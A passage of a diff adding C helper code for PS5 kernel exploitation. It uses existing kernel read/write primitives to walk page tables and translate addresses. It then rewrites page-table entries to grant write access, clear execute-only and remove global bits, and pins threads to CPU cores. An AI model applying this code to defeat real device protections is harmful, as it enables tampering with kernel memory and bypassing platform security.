0; +} + +int init_global_vars(void) { + ktext = KERNEL_ADDRESS_TEXT_BASE; + kdata = KERNEL_ADDRESS_DATA_BASE; + + flat_pmap kernel_pmap; + kread(ktext + env_offset.PMAP_STORE, &kernel_pmap, sizeof(kernel_pmap)); + if (kernel_pmap.pm_pml4 == 0 || kernel_pmap.pm_cr3 == 0) + return -1; + + cr3 = kernel_pmap.pm_cr3; + dmap = kernel_pmap.pm_pml4 - kernel_pmap.pm_cr3; + + return 0; +} + +uint64_t get_offset_va(uint64_t offset) { return ktext + offset; } + +uint64_t get_pml4(uint64_t pmap) { return kread64(pmap + 0x20); } + +uint64_t getpmap(uint64_t proc) { + uint64_t vm = kread64(proc + KERNEL_OFFSET_PROC_P_VMSPACE); + uint64_t vm_pmap = kread64(vm + env_offset.VMSPACE_VM_PMAP); + return vm_pmap; +} + +// for ring3 +uint64_t va_to_pa_user(uint64_t va) { + uintptr_t self_pmap = getpmap(kernel_get_proc(getpid())); + uintptr_t self_pml4 = get_pml4(self_pmap); + uint64_t pa = va_to_pa_custom(va, self_pml4 & 0xFFFFFFFF); + return pa; +} + +// for ring0 +uint64_t va_to_pa_kernel(uint64_t va) { return va_to_pa_custom(va, cr3); } + +// Source: PS5_kldload +uint64_t va_to_pa_custom(uint64_t va, uint64_t cr3_custom) { + + uint64_t table_phys = cr3_custom & 0xFFFFFFFF; + + for (int level = 0; level < 4; level++) { + int shift = 39 - (level * 9); + uint64_t idx = (va >> shift) & 0x1FF; + uint64_t entry; + uint64_t entry_va = dmap + PAGE_PA(table_phys) + idx * 8; + + kread(dmap + PAGE_PA(table_phys) + idx * 8, &entry, sizeof(entry)); + + if (!PAGE_P(entry)) + return 0; + + if ((level == 1 || level == 2) && PAGE_PS(entry)) { + uint64_t page_size = P_SIZE(level); + return PAGE_PA(entry) | (va & (page_size - 1)); + } + + if (level == 3) + return PAGE_PA(entry) | (va & 0xFFF); + + table_phys = PAGE_PA(entry); + } + return 0; +} + +uint64_t pa_to_dmap(uint64_t pa) { return dmap + pa; } + +// Set RW bit on all levels if needed and remove eXecute Only bit +void page_chain_set_rw(uint64_t va) { + + uint64_t table_phys = cr3; + + for (int level = 0; level < 4; level++) { + int shift = 39 - (level * 9); + uint64_t idx = (va >> shift) & 0x1FF; + uint64_t entry_va = dmap + PAGE_PA(table_phys) + idx * 8; + uint64_t entry; + + // Read Level X entry + kread(entry_va, &entry, sizeof(entry)); + + if (!PAGE_P(entry)) + return; + + uint8_t update = 0; + // Set RW bit on this level + if (!PAGE_RW(entry)) { + PAGE_SET_RW(entry); + update = 1; + } + // Unset XO on this level + if (PAGE_XO(entry)) { + PAGE_CLEAR_XO(entry); + update = 1; + } + if (update) { + kwrite(entry_va, &entry, sizeof(entry)); + } + + if (((level == 1 || level == 2) && PAGE_PS(entry)) || (level == 3)) { + return; + } + + table_phys = PAGE_PA(entry); + } + return; +} + +// Remove Global bit on last level +uint64_t page_remove_global(uint64_t va) { + + uint64_t table_phys = cr3; + + for (int level = 0; level < 4; level++) { + int shift = 39 - (level * 9); + uint64_t idx = (va >> shift) & 0x1FF; + uint64_t entry_va = dmap + PAGE_PA(table_phys) + idx * 8; + uint64_t entry; + + // Read Level X entry + kread(entry_va, &entry, sizeof(entry)); + + if (!PAGE_P(entry)) + return 0; + + if ((level == 1 || level == 2) && PAGE_PS(entry)) { + PAGE_CLEAR_G(entry); + kwrite(entry_va, &entry, sizeof(entry)); + + uint64_t page_size = P_SIZE(level); + return PAGE_PA(entry) | (va & (page_size - 1)); + } + + if (level == 3) { + + PAGE_CLEAR_G(entry); + kwrite(entry_va, &entry, sizeof(entry)); + + return PAGE_PA(entry) | (va & 0xFFF); + } + + table_phys = PAGE_PA(entry); + } + return 0; +} + +int pin_to_core(int n) { + uint64_t m[2] = {0}; + m[0] = (1 << n); + return cpuset_setaffinity(3, 1, -1, 0x10, (const cpuset_t *)m); +} + +int pin_to_first_available_core(void) { + for (int i = 0; i < 16; i++) + if (pin_to_core(i) == 0) + return i; + return -1; +} + +void unpin(void) { + uint64_t m[2] = {0xFFFF, 0}; + cpuset_setaffinity(3, 1, -1, 0x10, (const cpuset_t *)m); +} \ No newline at end of file